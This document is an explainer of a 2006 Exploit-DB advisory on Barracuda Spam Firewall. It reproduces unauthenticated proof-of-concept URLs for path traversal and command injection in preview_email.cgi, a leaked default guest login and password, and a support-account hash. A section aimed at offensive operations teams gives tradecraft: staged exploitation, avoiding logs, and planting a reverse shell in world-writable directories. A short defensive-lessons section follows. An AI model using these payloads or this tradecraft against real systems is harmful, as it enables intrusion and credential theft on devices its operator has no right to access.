Barracuda Spam Firewall 3.3.03.053 - Arbitrary File Disclosure and Command Execution Explained

What this paper is

This paper details a vulnerability in Barracuda Spam Firewall versions 3.3.01.001 through 3.3.03.053. It describes two main issues:

1. Arbitrary File Disclosure: An attacker can read sensitive configuration files and scripts from the device.
2. Remote Command Execution: An attacker can execute arbitrary commands on the device, potentially leading to full compromise.

The exploit leverages a flaw in the preview_email.cgi script.

Simple technical breakdown

The core of the vulnerability lies in how the preview_email.cgi script handles user-supplied input for the file parameter.

• Path Traversal: The script doesn't properly sanitize the file parameter. This allows an attacker to use ../ (dot-dot-slash) sequences to navigate outside the intended directory and access files anywhere on the filesystem.
• Command Injection: By using the pipe character (|), an attacker can append their own commands to the script's intended operation. The script then executes these commands.

The paper also mentions an "admin login/pass vuln," which seems to refer to the ability to retrieve credentials from a file (update_admin_passwd.pl) after gaining file disclosure.

Complete code and payload walkthrough

The provided "code" is not a traditional exploit script but rather a set of proof-of-concept (PoC) URLs demonstrating the vulnerabilities. There is no executable code or shellcode provided in the raw paper content.

Let's break down the PoC URLs:

1. Arbitrary File Disclosure (Configuration File):

• URL: https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
• Explanation:
  • <deviceIP>: This is a placeholder for the IP address of the vulnerable Barracuda Spam Firewall.
  • /cgi-bin/preview_email.cgi: This is the vulnerable CGI script on the device.
  • ?file=: This indicates the parameter being passed to the script.
  • /mail/mlog/: This is likely the intended base directory or a path within the script's context.
  • ../tmp/backup/periodic_config.txt.tmp: This is the crucial part.
    • ../: This is a path traversal sequence. It tells the system to move up one directory level.
    • tmp/backup/periodic_config.txt.tmp: This is the target file path. By using ../ from /mail/mlog/, the script is instructed to look for periodic_config.txt.tmp in the /tmp/backup/ directory, which is outside the expected mlog directory.
• Practical Purpose: This PoC aims to disclose the content of a temporary configuration backup file.

2. Arbitrary File Disclosure (Script File) and Command Execution Setup:

• URL: https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
• Explanation:
  • /mail/mlog/: Base path.
  • ../../bin/: More path traversal, moving up two directories and then into a bin directory.
  • ls%20/: This is the command to be executed. %20 is the URL-encoded space character. So, it's ls /.
  • |: The pipe character. This is where the command injection happens. The script is instructed to execute ls / and then pipe its output. However, in this specific PoC, the pipe is at the end, suggesting it's setting up for a subsequent command. The ls / part itself is likely intended to be executed and its output potentially displayed or processed.
• Practical Purpose: This PoC demonstrates accessing files in the /bin/ directory and sets up the mechanism for command injection. The ls / part might be to confirm directory traversal and command execution capability.

3. Remote Command Execution (Simple Command):

• URL: https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|
• Explanation:
  • /mail/mlog/: Base path.
  • |: The pipe character, initiating command injection.
  • uname%20-a: The command to be executed. %20 is a space. This command prints system information.
  • |: Another pipe character. This might be to terminate the command or pass its output to another (non-existent in this PoC) command.
• Practical Purpose: This PoC directly executes the uname -a command on the target device and displays its output. This confirms remote command execution.

4. Arbitrary File Disclosure (Admin Credentials Script):

• URL: https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
• Explanation:
  • /mail/mlog: Base path.
  • |: Initiates command injection.
  • cat%20update_admin_passwd.pl: The command to execute. It uses cat to display the content of the update_admin_passwd.pl file.
  • |: Terminates the command.
• Practical Purpose: This PoC aims to retrieve the content of the update_admin_passwd.pl script, which likely contains sensitive information, potentially including hardcoded credentials or encryption keys.

5. Arbitrary File Disclosure (Direct Script Access):

• URL: https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
• Explanation:
  • /mail/mlog/: Base path.
  • ../bin/update_admin_passwd.pl: Path traversal to access the update_admin_passwd.pl script directly.
• Practical Purpose: This PoC is another way to disclose the content of the update_admin_passwd.pl script, similar to the previous one but without using command injection.

6. Example of Retrieved Credentials:

• Command: /home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1
• Explanation: This is presented as an example of what might be found or executed after exploiting the vulnerabilities.
  • /home/emailswitch/code/firmware/current/bin/updateUser.pl: A script that likely manages user accounts.
  • guest: A username.
  • phteam99: A password.
  • 2>&1: Redirects standard error to standard output, so any error messages are also displayed.
• Practical Purpose: This demonstrates that the update_admin_passwd.pl script (or similar mechanisms) might reveal credentials, and that these credentials can be used to log in.

7. Accessible Folders:

• https://<deviceIP>/Translators/
• https://<deviceIP>/images/
• https://<deviceIP>/locale
• https://<deviceIP>/plugins
• https://<deviceIP>/help
• Explanation: These are examples of directories that are accessible via HTTP without authentication.
• Practical Purpose: These could be used for reconnaissance or to host malicious files if further exploitation is attempted.

8. Stuff in do_install (System Configuration Snippets):

• /usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM
  • Explanation: This command adds a new user named support.
    • -s /home/emailswitch/code/firmware/current/bin/request_support.pl: Sets the user's login shell to a specific Perl script. This script might be executed upon login, potentially leading to further compromise.
    • -p swUpHFjf1MUiM: Sets the user's password. swUpHFjf1MUiM is likely a hashed password.
• /bin/mkdir -p /mail/tmp/backup/
  • Explanation: Creates a directory named backup inside /mail/tmp/. The -p flag ensures that parent directories are created if they don't exist.
• chmod -R 777 /mail/tmp/
  • Explanation: Sets the permissions for the /mail/tmp/ directory and its contents to 777 (read, write, execute for owner, group, and others). This makes the directory world-writable.
• /bin/mkdir -p /mnt/smb/
  • Explanation: Creates a directory named smb inside /mnt/.
• chmod 777 /mnt/smb/
  • Explanation: Sets the permissions for the /mnt/smb/ directory to 777, making it world-writable.
• Practical Purpose: These snippets reveal how the system is configured, including user creation with custom shells and the creation of world-writable directories, which can be leveraged for further exploitation or persistence.

Mapping list:

• https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp -> Arbitrary File Disclosure (Configuration)
• https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| -> Path Traversal, Command Injection Setup, File Disclosure (binaries)
• https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a| -> Remote Command Execution (uname -a)
• https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl| -> Arbitrary File Disclosure (Credentials Script) via Command Injection
• https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl -> Arbitrary File Disclosure (Credentials Script) via Path Traversal
• /home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1 -> Example of credential usage and user management script.
• /usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM -> System configuration snippet: user creation with custom shell.
• /bin/mkdir -p /mail/tmp/backup/ and chmod -R 777 /mail/tmp/ -> System configuration snippet: creation of a world-writable temporary directory.
• /bin/mkdir -p /mnt/smb/ and chmod 777 /mnt/smb/ -> System configuration snippet: creation of a world-writable SMB mount point.

Practical details for offensive operations teams

• Required Access Level: Network access to the target device's IP address. No authentication is required for the initial exploitation of preview_email.cgi.
• Lab Preconditions:
  • A Barracuda Spam Firewall appliance running a vulnerable version (3.3.01.001 to 3.3.03.053).
  • Network connectivity to the appliance's web interface (typically port 80 or 443).
  • Understanding of the appliance's internal file system structure (based on the PoC paths).
• Tooling Assumptions:
  • A web browser for manual testing and PoC verification.
  • A command-line tool like curl or wget for scripting requests.
  • A proxy like Burp Suite or OWASP ZAP to intercept and modify requests.
  • A network scanner (e.g., Nmap) to identify target IPs and open ports.
• Execution Pitfalls:
  • URL Encoding: Ensure all special characters (like spaces, pipes, slashes) are correctly URL-encoded when constructing requests.
  • Firewall/WAF: Network firewalls or Web Application Firewalls (WAFs) might block requests containing suspicious patterns like ../ or |.
  • Logging: The appliance might log requests to preview_email.cgi, especially those with unusual parameters. This could alert administrators.
  • File Paths: The exact file paths (/mail/mlog/, /tmp/backup/, /bin/) might differ slightly in other firmware versions or configurations, requiring reconnaissance.
  • Command Output: The output of injected commands might be displayed directly in the HTTP response, or it might be suppressed or logged elsewhere. The 2>&1 redirection in the example suggests that capturing errors is important.
  • Shell vs. CGI: The preview_email.cgi script is a CGI application, not a full shell. Command execution might be limited by the environment and permissions of the web server process.
• Tradecraft Considerations:
  • Reconnaissance: Identify target IP addresses and confirm the vulnerable service is exposed.
  • Staged Exploitation:
    1. File Disclosure: Start by disclosing sensitive files like periodic_config.txt.tmp or update_admin_passwd.pl to gather information (credentials, system paths, user accounts).
    2. Command Execution: Use uname -a or id to confirm execution capabilities.
    3. Persistence/Further Exploitation: If credentials are found, attempt to log in. If not, use command execution to download a more sophisticated payload (e.g., a reverse shell) to a world-writable directory like /mail/tmp/ or /mnt/smb/.
  • Stealth: Avoid noisy commands. Use commands that are less likely to be logged or trigger alerts. Consider using encoded commands if possible.
  • Payload Delivery: If a reverse shell is desired, it would need to be uploaded or written to a file on the target system first, then executed. The world-writable directories (/mail/tmp/, /mnt/smb/) are prime candidates for this.
  • Credential Harvesting: The updateUser.pl example suggests that the system might have mechanisms to add users or change passwords. If the update_admin_passwd.pl script reveals how this works, it could be used for account takeover.

Where this was used and when

• Discovery Date: The paper was published on August 8, 2006. The vulnerability was discovered by Greg Sinclair and updated by PATz.
• Affected Versions: Barracuda Spam Firewall versions 3.3.01.001 to 3.3.03.053.
• Context: This type of vulnerability was common in the mid-2000s, where web applications and embedded devices often lacked robust input validation, leading to path traversal and command injection flaws. These devices were often deployed in enterprise environments to filter email, making them attractive targets for attackers seeking to gain a foothold within a network.

Defensive lessons for modern teams

• Input Validation is Paramount: Always sanitize and validate user-supplied input, especially in web applications and CGI scripts. Never trust user input.
• Principle of Least Privilege: Ensure that web server processes and CGI scripts run with the minimum necessary privileges. Avoid world-writable directories in sensitive areas.
• Secure Configuration Management: Regularly review system configurations. Avoid hardcoded credentials in scripts. Implement secure password management practices.
• Patch Management: Keep all software, including firmware on network appliances, up to date with the latest security patches.
• Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common web attacks like path traversal and command injection.
• Logging and Monitoring: Implement comprehensive logging for web server access and application events. Monitor logs for suspicious activity, such as unusual URL patterns or command executions.
• Network Segmentation: Isolate critical appliances and services to limit the blast radius of a compromise.

ASCII visual (if applicable)

This vulnerability is primarily a web request manipulation, so a complex architecture diagram isn't strictly necessary. However, we can visualize the request flow and the path traversal:

+-------------------+      +-------------------------+      +---------------------+
| Attacker's Machine| ---> | Barracuda Spam Firewall | ---> | Target File/Command |
| (Browser/Tool)    |      | (Web Server / CGI)      |      | on Device           |
+-------------------+      +-------------------------+      +---------------------+
                                       |
                                       | Request:
                                       | GET /cgi-bin/preview_email.cgi?file=
                                       |
                                       v
                           +-------------------------+
                           | preview_email.cgi       |
                           | (Vulnerable Script)     |
                           +-------------------------+
                                       |
                                       | Processes 'file' parameter:
                                       | e.g., /mail/mlog/../tmp/backup/periodic_config.txt.tmp
                                       |
                                       v
                           +-------------------------+
                           | OS File System Access   |
                           | (Path Traversal occurs) |
                           +-------------------------+
                                       |
                                       | Reads: /tmp/backup/periodic_config.txt.tmp
                                       | OR
                                       | Executes: |uname -a|
                                       |
                                       v
                           +-------------------------+
                           | Data/Command Output     |
                           | Returned in HTTP Resp.  |
                           +-------------------------+

Source references

• Exploit-DB Paper ID: 2145
• Paper Title: Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)
• Author: PATz
• Published: 2006-08-08
• Original Paper URL: https://www.exploit-db.com/papers/2145
• Raw Exploit URL: https://www.exploit-db.com/raw/2145

Original Exploit-DB Content (Verbatim)

Title: Barracuda Arbitrary File Disclosure + Command Execution
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair
Credits: Matthew Hall
Update: 07 August 2006
Updated by: PATz
 
####################################################################
 
Proof of Concept:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
 
 
####################################################################
 
#using |unix| for command execution:
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|

#admin login/pass vuln
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
 
eg.

#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`;
login: guest pass: phteam99

some folder are accessible via http without permission
https://<deviceIP>/Translators/
https://<deviceIP>/images/
https://<deviceIP>/locale
https://<deviceIP>/plugins
https://<deviceIP>/help
 
#stuff in do_install
 
/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM
 
## Create backup tmp dir

/bin/mkdir -p /mail/tmp/backup/
chmod -R 777 /mail/tmp/
 
## Create smb backup mount point
/bin/mkdir -p /mnt/smb/
chmod 777 /mnt/smb/
 
.................................
Greetz to all noypi and phteam ^^,
.............eof.................

# milw0rm.com [2006-08-08]